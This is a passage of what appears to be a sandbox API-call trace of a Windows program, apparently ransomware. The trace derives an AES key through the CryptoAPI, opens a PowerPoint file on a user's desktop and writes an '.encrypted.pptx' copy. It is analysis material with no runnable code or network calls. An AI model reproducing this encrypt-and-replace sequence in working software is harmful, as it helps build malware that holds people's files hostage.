out: lpMsg=0x6ae1c4) returned 0 [0030.548] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.548] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.548] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0030.548] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0030.548] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0030.549] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.549] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.549] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.549] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.549] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.549] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0030.549] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.549] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.549] CryptCreateHash (in: hProv=0x7d5c40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0030.549] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.549] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.549] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.549] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.549] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0030.549] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.549] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.549] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.549] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.549] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.549] CryptHashData (hHash=0x7c2240, pbData=0x7c75d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0030.549] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.549] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.549] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.549] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.550] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.550] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0030.550] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.550] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.550] CryptDeriveKey (in: hProv=0x7d5c40, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2200) returned 1 [0030.550] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.550] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.550] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.550] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.550] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.550] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.550] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0030.550] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.550] CryptDestroyHash (hHash=0x7c2240) returned 1 [0030.550] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.550] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.550] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.550] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.550] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.551] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\0CZNNBZljlBQ.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\clveu\\0cznnbzljlbq.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0030.551] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0030.551] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0030.551] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0030.551] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0030.551] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0030.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0030.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0030.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0030.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0030.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0030.551] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 1 [0030.551] TranslateMessage (lpMsg=0x6aed6c) returned 0 [0030.551] DispatchMessageW (lpMsg=0x6aed6c) returned 0x0 [0030.551] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0030.551] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0030.551] Shell_NotifyIconW (dwMessage=0x1, lpData=0x6ae408) returned 1 [0030.552] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0030.552] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0030.552] KillTimer (hWnd=0x50134, uIDEvent=0x1) returned 1 [0030.552] SetTimer (hWnd=0x50134, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0030.552] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.552] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0030.552] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0030.552] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0030.552] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0030.552] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.552] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0030.552] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0030.552] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.552] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0030.552] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.553] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0030.553] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0030.553] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0030.553] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0030.553] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0030.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.553] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0030.553] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0030.553] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0030.553] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0030.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0030.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0030.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.553] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0030.553] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0030.553] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0030.553] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0030.553] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0030.553] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0030.553] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0030.553] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0030.553] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0030.553] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0030.553] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0030.553] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0030.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0030.553] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0030.553] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0030.553] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc0) returned 0x7c75d0 [0030.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0030.553] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0030.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0030.553] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0030.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c75d0 | out: hHeap=0x770000) returned 1 [0030.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0030.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0030.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0030.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0030.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0030.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0030.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.554] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0030.554] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0030.554] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\clveu")) returned 0x10 [0030.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0030.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0030.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0030.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0030.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.554] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0030.554] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x88ffb0 [0030.555] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0030.555] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0030.555] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\0CZNNBZljlBQ.encrypted.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\clveu\\0cznnbzljlbq.encrypted.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0030.555] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0030.555] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0030.555] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0030.555] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0030.555] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0030.555] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0030.555] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0030.556] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0030.556] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0030.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0030.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0030.556] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0030.556] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.556] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0030.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0030.556] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.556] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0030.556] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0030.556] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0030.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0030.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0030.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0030.556] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0030.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0030.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0030.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0030.556] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0030.556] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.556] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0030.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0030.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0030.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0030.557] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0030.557] ReadFile (in: hFile=0x140, lpBuffer=0x936008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x936008*, lpNumberOfBytesRead=0x6ae9b8*=0x3119, lpOverlapped=0x0) returned 1 [0030.558] ReadFile (in: hFile=0x140, lpBuffer=0x936008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x936008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0030.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0030.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0030.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0030.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3119) returned 0x7c7968 [0030.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0030.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0030.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0030.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0030.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0030.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0030.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3119) returned 0x946010 [0030.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c7968 | out: hHeap=0x770000) returned 1 [0030.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.559] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0030.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0030.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0030.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0030.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0030.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3119) returned 0x7c7968 [0030.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c7968 | out: hHeap=0x770000) returned 1 [0030.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0030.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0030.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.560] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0030.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0030.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0030.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 